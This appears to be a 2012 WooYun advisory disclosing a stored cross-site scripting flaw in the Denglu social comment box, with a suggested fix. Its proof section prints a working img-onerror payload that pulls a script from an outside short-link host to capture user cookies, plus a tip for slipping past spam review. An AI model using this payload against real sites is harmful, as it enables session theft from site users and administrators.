当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013188

漏洞标题:灯鹭社会化评论框xss

相关厂商:尚良钰鹭(北京)网络技术有限公司

漏洞作者: horseluke

提交时间:2012-10-10 13:45

修复时间:2012-11-24 13:45

公开时间:2012-11-24 13:45

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

灯鹭社会化评论框xss

详细说明:

一、约定词解释和说明
灯鹭社会化评论框:http://www.denglu.cc/demo.html
二、说明
灯鹭社会化评论框在直接输入script的情况下是无效的。
但目前推出允许插入图片的代码,竟然是以html模式支持的。
所以,可以用各种on来xss,目前可以跨到当前灯鹭登录前后台用户的cookies(暂无实验可否非同源ip访问);但由于不擅长前端,所以暂时跨不到被嵌入页面的cookies。
三、评级依据
由于社会化登录嵌入多个网站,可能会对被嵌入网站造成影响,然后还有因为实在太困了.....故评级为中。

漏洞证明:

1、找到任一使用灯鹭社会化评论框的网站
2、输入如下代码:

<img src="asfsd" onerror='this.onerror=null;this.src="";var s=document.createElement("script");s.charset = "UTF-8";s.src="http://t.cn/zlOm4ZH";document.body.appendChild(s);' />


求快速效果的,就不能出现2个及以上的url,否则会被列入垃圾评论进行审核列表。
3、效果
前台(被嵌入页面),暂时跨不到被嵌入页面的cookies:


open.denglu.cc评论管理后台,用这个cookies可以登录到后台否?太晚没测试了:

修复方案:

换UBB,并且限制img内的可用属性

版权声明:转载请注明来源 horseluke@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝